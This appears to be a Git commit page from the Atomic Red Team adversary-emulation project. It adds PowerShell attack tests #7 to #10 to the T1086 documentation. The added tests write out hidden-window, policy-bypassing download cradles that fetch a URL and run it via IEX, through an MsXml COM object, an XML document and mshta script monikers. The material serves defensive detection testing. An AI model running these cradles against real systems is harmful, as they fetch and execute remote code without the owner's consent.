security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=validate_atomics_generate_docs branch=T1086-mhaag

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2018-07-09 16:52:30 +00:00
parent f5a5aa8d6a
commit e9852d00b4
3 changed files with 89 additions and 0 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/T1086/T1086.md
+81
View File
@@ -34,6 +34,14 @@ Remote Support: Yes</blockquote>
- [Atomic Test #6 - PowerShell Add User](#atomic-test-6---powershell-add-user)
- [Atomic Test #7 - Powershell MsXml COM object](#atomic-test-7---powershell-msxml-com-object)
- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests)
- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download)
- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle)
<br/>
@@ -142,3 +150,76 @@ Using PS 5.1, add a user via CLI
New-LocalUser -FullName '${full_name}' -Name '${user_name}' -Password ${password} Description '${description}'
```
<br/>
<br/>
## Atomic Test #7 - Powershell MsXml COM object
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell MsXml COM object.
Not proxy aware removing cache although does not appear to write to those locations
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.ps1|
#### Run it with `powershell`!
```
powershell.exe -exec bypass -windowstyle hidden -noprofile “$comMsXml=New-Object -ComObject MsXml2.ServerXmlHttp;$comMsXml.Open(GET,${url}',$False);$comMsXml.Send();IEX $comMsXml.ResponseText”
```
<br/>
<br/>
## Atomic Test #8 - Powershell XML requests
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell xml download request
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/test.xml|
#### Run it with `powershell`!
```
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -windowstyle hidden -noprofile "$Xml = (New-Object System.Xml.XmlDocument);$Xml.Load('${url}');$Xml.command.a.execute | IEX"
```
<br/>
<br/>
## Atomic Test #9 - Powershell invoke mshta.exe download
Provided by https://github.com/mgreen27/mgreen27.github.io
Powershell invoke mshta to download payload
**Supported Platforms:** Windows
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| url | url of payload to execute | url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1086/payloads/mshta.sct|
#### Run it with `powershell`!
```
"C:\Windows\system32\cmd.exe" /c "mshta.exe javascript:a=GetObject("script:${url}").Exec();close()"
```
<br/>
<br/>
## Atomic Test #10 - Powershell Invoke-DownloadCradle
Provided by https://github.com/mgreen27/mgreen27.github.io
Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Powershell_ise as a Privileged Account
2. Invoke-DownloadCradle.ps1
<br/>
atomics/index.md
+4
View File
@@ -454,6 +454,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]
atomics/windows-index.md
+4
View File
@@ -374,6 +374,10 @@
- Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #5: Invoke-AppPathBypass [windows]
- Atomic Test #6: PowerShell Add User [windows]
- Atomic Test #7: Powershell MsXml COM object [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- [T1121 Regsvcs/Regasm](./T1121/T1121.md)
- Atomic Test #1: Regasm Uninstall Method Call Test [windows]
- Atomic Test #2: Regsvs Uninstall Method Call Test [windows]